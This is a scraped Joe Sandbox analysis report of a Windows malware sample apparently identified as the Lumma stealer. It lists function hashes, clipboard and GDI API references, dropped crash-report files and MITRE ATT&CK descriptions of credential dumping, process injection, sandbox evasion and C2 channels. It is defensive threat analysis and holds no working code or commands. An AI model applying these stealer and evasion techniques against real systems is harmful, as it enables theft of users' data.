Instruction ID: 3a1acdae580ce5f065c9180226cb4cff7fe22f61593509f9676645d48edde3d0
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 09D097245083E10E57098D3800A08FBFBF8FD43012B08309EF0D5E3206C320E8018358

Function 0040E7D0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: b3182e44b2db36c859fdfcc1cbb8d28269d97cd5aa79826e928834b3b327505f
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 81D0A7715497B10E97588D3904A0477FBE8E947652F1818AFF4D1F3245D234DC11969C

Function 028EA4B1 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a015d2ef646d89649cca2b2954e2004bc61457c65f9078ac4670d750510f73e1
Instruction ID: 71fd4f4b05e1670decfe39fea6921dc181e4c460c0dd1d804a64067c6892f815
Opcode Fuzzy Hash: a015d2ef646d89649cca2b2954e2004bc61457c65f9078ac4670d750510f73e1
Instruction Fuzzy Hash: E0D0C976E955349746569A549C121B9B2B0E71B702F4620768CC7FB122DE22E90A4788

Function 028D3743 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df84ac477a950037042e5086e55d2cd836d62a2ae8db691525ee81ba56446247
Instruction ID: 6f023d8e3480babd856e322613082044c73e6f9a662b5033144713abdee2c473
Opcode Fuzzy Hash: df84ac477a950037042e5086e55d2cd836d62a2ae8db691525ee81ba56446247
Instruction Fuzzy Hash: 2EC012ACE458A043850B3B38AC804BF61320E43600F002079D502A2220AE0B872A0CDF

Function 004234DC Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: badad02e532255346765b1564602ae8a007c5ae2d1bef3eec90658f80721b624
Instruction ID: 84b7725253959dc8abe050b3b0db1ec788fbe188385e5cfc96be796f1a504276
Opcode Fuzzy Hash: badad02e532255346765b1564602ae8a007c5ae2d1bef3eec90658f80721b624
Instruction Fuzzy Hash: 29C002A5F0182056E40A3F22381657E60255A57628BC5263AF84A32183AA3EAA1A84DF

Function 028C7EA3 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a726be43663b4d544551898ddc59a970b57716c49ce45ceeaa2279788cac39dc
Instruction ID: 3f1c0737dd0aea177ee77dd974b740aa20b115bb41a2a492f249ffb647676684
Opcode Fuzzy Hash: a726be43663b4d544551898ddc59a970b57716c49ce45ceeaa2279788cac39dc
Instruction Fuzzy Hash: 75C08CEDC0C2808FD306CF20CC82775B2BE1F03200F192868C006ABA21C32AED10CB29

Function 028B1F8F Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d131f4710dd250bef639ff969ca5cbbf2b4f1d405ca4a4f6db10f2d6722a03
Instruction ID: 0fb589df1956dfee2daab7f60ace09584507eb5c2b248fa4b2e5aa4f8de3ba08
Opcode Fuzzy Hash: e9d131f4710dd250bef639ff969ca5cbbf2b4f1d405ca4a4f6db10f2d6722a03
Instruction Fuzzy Hash: 1FC01234954201CBC3148F04C441470F3B0FF17301B212848D0D5E7235C3B8C541C748

Function 028B203D Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b11e62c2cfec2e2e2599574f7bd10b2f6d4f6b65653d54e2512990ea8543b82
Instruction ID: f586e8e9f778338478616284a23de36a5cbc3303ace67382d384ac79f0145c70
Opcode Fuzzy Hash: 0b11e62c2cfec2e2e2599574f7bd10b2f6d4f6b65653d54e2512990ea8543b82
Instruction Fuzzy Hash: E8C04C75E55205CFE30CCF04C4818A0F7B5BB5B311F212858D199EB361C374E950CB88

Function 028CE257 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677bb1b944a4c26d7b710d4cb9975fbf9fb8021130115870a124c95ca9721471
Instruction ID: 9b2f14a17c89f3adf1950d0445feb2067b00b8c668dc1f829f60ef2ad7e80d15
Opcode Fuzzy Hash: 677bb1b944a4c26d7b710d4cb9975fbf9fb8021130115870a124c95ca9721471
Instruction Fuzzy Hash: 4FB00278A447008B8211CF14D584865F3B9A74B611B25A554D55967726C324E9458A58

Function 028C7EDB Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a23f6694077857f8c3683f90b8e231f639f0be2e7c6d3f0793d238d1bb9ae5
Instruction ID: 4fcc47f9501deea176661d8a0a937f390e1a6d086f247b637cf7289dc2bf0faf
Opcode Fuzzy Hash: a3a23f6694077857f8c3683f90b8e231f639f0be2e7c6d3f0793d238d1bb9ae5
Instruction Fuzzy Hash: 3AA00224E581008E8258CF159D50670E2B9678F101F543428940EF3951D650D404861C

Function 00417C74 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3a23f6694077857f8c3683f90b8e231f639f0be2e7c6d3f0793d238d1bb9ae5
Instruction ID: 4fcc47f9501deea176661d8a0a937f390e1a6d086f247b637cf7289dc2bf0faf
Opcode Fuzzy Hash: a3a23f6694077857f8c3683f90b8e231f639f0be2e7c6d3f0793d238d1bb9ae5
Instruction Fuzzy Hash: 3AA00224E581008E8258CF159D50670E2B9678F101F543428940EF3951D650D404861C

Function 028EA21D Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7a8ab58f3507cb6f10ac9665032d2cc2b2befa9dde311dc5749d7bdfe264df
Instruction ID: 9a429f594d9aa6cd10fc907b9b85319a3be5e715b4ab8238563a3d469e2eb8ee
Opcode Fuzzy Hash: 2e7a8ab58f3507cb6f10ac9665032d2cc2b2befa9dde311dc5749d7bdfe264df
Instruction Fuzzy Hash: 16900224E4C1208681018F109680475E339538B101F20B1508018330198725D506459C

Function 028DE7F7 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 127clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 028DE814
GetWindowLongW.USER32 ref: 028DE837
GetClipboardData.USER32 ref: 028DE84B
GlobalFix.KERNEL32 ref: 028DE870
GlobalUnWire.KERNEL32 ref: 028DE9A2
CloseClipboard.USER32 ref: 028DE9AF

Strings

V, xrefs: 028DE8C8
n, xrefs: 028DE8E6
l, xrefs: 028DE8F0
W, xrefs: 028DE8D2
b, xrefs: 028DE8CD
!, xrefs: 028DE8B9
c, xrefs: 028DE8EB
c, xrefs: 028DE8C3
a, xrefs: 028DE8D7
[, xrefs: 028DE8BE
P, xrefs: 028DE8DC

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLongOpenWindowWire
String ID: !$P$V$W$[$a$b$c$c$l$n
API String ID: 2719171733-442629251
Opcode ID: edb2dee7931d194b1b4f473d9ac369ee6fb036350fb57752a0743bea2b188889
Instruction ID: 6e9a27c4da07f11e4d03d787a909858d30294a7b411b323d9af0ba5766af653c
Opcode Fuzzy Hash: edb2dee7931d194b1b4f473d9ac369ee6fb036350fb57752a0743bea2b188889
Instruction Fuzzy Hash: 5F51347980C380DFD341EF68D44835EBFE1AB9A219F040A2DE4D99B291C3759649CBA7

Function 0042EED6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042EF4F
GetSystemMetrics.USER32 ref: 0042EF60
DeleteObject.GDI32 ref: 0042EFC2
SelectObject.GDI32 ref: 0042F010
SelectObject.GDI32 ref: 0042F0B0
DeleteObject.GDI32 ref: 0042F0E7

Strings

, xrefs: 0042F083

Memory Dump Source

Source File: 00000000.00000002.2155251759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2155251759.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$DeleteMetricsSelectSystem
String ID:
API String ID: 3911056724-3916222277
Opcode ID: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction ID: 26a77810473a649a6d0160a218d90b5f45665e556e32aa297b76d88d748b452a
Opcode Fuzzy Hash: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction Fuzzy Hash: F78159B4A04B00DFC754EF29D595A1ABBF0FB4A310F10896DE99ACB364D731A849CF52

Function 028DECD7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 028DEDEC
SelectObject.GDI32 ref: 028DEE46
SelectObject.GDI32 ref: 028DEED4
DeleteObject.GDI32 ref: 028DEF11

Strings

, xrefs: 028DEEA1

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-3916222277
Opcode ID: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction ID: c719bb1c0710dc27e7e1194b8e197fc04879d46310270cee4896a9cbd7ee3779
Opcode Fuzzy Hash: bcf94c8979bb7764ca8433f98d3f91d2a126e05a4c66d84b124e04768f202066
Instruction Fuzzy Hash: 6C914AB4A05B008FD364EF29D581A16BBF1FB49700B104A6DE99AC7760D731F848CF52

Function 028DF13D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 028DF229
SelectObject.GDI32 ref: 028DF277
SelectObject.GDI32 ref: 028DF317
DeleteObject.GDI32 ref: 028DF34E

Strings

, xrefs: 028DF2EA

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Object$DeleteSelect
String ID:
API String ID: 618127014-3916222277
Opcode ID: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction ID: abc4bfd531c10bb5456e208f162b7ff92b0e4513110b575e0e5b465c1d14dff6
Opcode Fuzzy Hash: 461fbfb80a460c3b39bf0b666b40d54a05e386a3a522afec03fe1f1ee577d6ba
Instruction Fuzzy Hash: 438159B4A04B00DFC754EF29D595A1ABBF0FB4A310F10896DE99ACB364D731A849CF52

Function 028D73B2 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 462COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 028D74DD

Strings

cfbe, xrefs: 028D764F
2PBv, xrefs: 028D73D7

Memory Dump Source

Source File: 00000000.00000002.2156349896.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_28b0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: 2PBv$cfbe
API String ID: 3664257935-2258403321
Opcode ID: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction ID: f35dae4a56361b976a1612784a369f39ef98f18751d78e9c8a07ab9653d8f803
Opcode Fuzzy Hash: a527324a8ce46518951fb6cac3254f6eb5a1fa1805477d40919ed588ff400953
Instruction Fuzzy Hash: AFF15B78504B808ED726CF34C894BE3BBE1AF56309F084A5DD0EF8B292D779A549CB54

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SecuriteInfo.com_4a6c55577aaedf8dddd3a286fa2779c4277b_c0c012cd_099ad559-0e01-4b7d-a504-7bb0194793d8\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER99A5.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AEE.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BBA.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe

Function 0040A660 Relevance: 23.0, Strings: 18, Instructions: 467
COMMON

Function 0042EA70 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 207
COMMON

Function 00420CED Relevance: 11.8, Strings: 9, Instructions: 516
COMMON

Function 00418192 Relevance: 10.8, Strings: 8, Instructions: 776
COMMON

Function 00410950 Relevance: 10.4, Strings: 8, Instructions: 384
COMMON

Function 00418C50 Relevance: 9.2, Strings: 7, Instructions: 425
COMMON

Function 0041003F Relevance: 9.1, Strings: 7, Instructions: 394
COMMON

Function 00416C48 Relevance: 8.0, Strings: 6, Instructions: 457
COMMON

Function 028B003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 0042714B Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 462
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre